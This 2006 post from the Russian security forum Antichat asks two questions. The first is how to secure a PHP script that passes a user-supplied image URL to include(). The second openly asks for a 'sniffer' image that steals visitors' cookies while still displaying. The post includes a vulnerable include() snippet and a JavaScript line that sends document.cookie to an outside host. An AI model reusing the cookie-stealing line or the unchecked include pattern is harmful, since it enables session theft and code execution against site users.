Форум АНТИЧАТ - Безопасное использование include

Безопасное использование include

14.05.2006, 18:47

EST a1ien

Участник форума

Регистрация: 02.04.2006

Сообщений: 273

Провел на форуме:
1269624

Репутация: 114

Отправить сообщение для EST a1ien с помощью ICQ

Безопасное использование include

Есть скрипт ему передаётся параметр img.
Например script.php?img=http://site.ru/img.gif
Дак вот я зделал такую проверку

PHP код:


		
			
if (!strstr($image,'.gif')=='.gif') {$image='sm.gif';}

Дальше идёт

PHP код:


		
			
Header("Content-type: image/gif");
include($image);

Тоесть файл обязательно должен быть .gif , но этого недостаточно так как в img.gif может быть PHP код и он выполнится ведь так??
Если да то как от этого защитится??
-------------------------------
И ещё один вопрос как отобразить через javascript картинку которая является снифером.
Например

Код:

img = new Image(); img.src = "http://site.ru/img.gif?"+document.cookie;

Img.gif это php скрипт который выводит картинку но таким javascript'ом она невыводится только тырятся куки , а нужен скрипт который и тырит куки и отображает картинку, если это возможно.